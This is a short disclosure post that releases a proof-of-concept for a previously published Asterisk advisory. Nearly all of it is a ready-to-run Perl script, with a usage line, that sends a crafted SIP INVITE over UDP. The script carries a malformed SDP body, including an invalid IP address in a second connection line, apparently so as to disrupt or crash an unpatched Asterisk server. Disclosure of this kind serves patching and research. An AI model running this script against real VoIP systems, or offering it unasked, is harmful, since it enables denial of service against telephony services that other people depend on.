Due to many requests for the POC and since most Asterisk systems should have been patched by now, please find in this message the POc for our advisory posted on http://seclists.org/fulldisclosure/2007/Mar/0315.html usage example: perl asterisk-Invite.pl 5060 userX 5060 userY #!/usr/bin/perl use IO::Socket::INET; die "Usage $0 " unless ($ARGV[5]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg="INVITE sip:$ARGV[2]\@$ARGV[0]:$ARGV[1] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3]:$ARGV[4];branch=01;rport\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nContent-Type: application/sdp\r\nCSeq: 01 INVITE\r\nContent-Length: 187\r\n\r\nv=0\r\no=root 25903 25903 IN IP4 $ARGV[3]\r\ns=session\r\nc=IN IP4 $ARGV[3]\r\nc=IN IP4 910.188.8.2\r\nt=0 0\r\nm=audio 13956 RTP/AVP 0 4 3 8 111 5 10 7 18 110 97 101\r\na=rtpmap:98 speex/16000\r\n\r\n"; $socket->send($msg);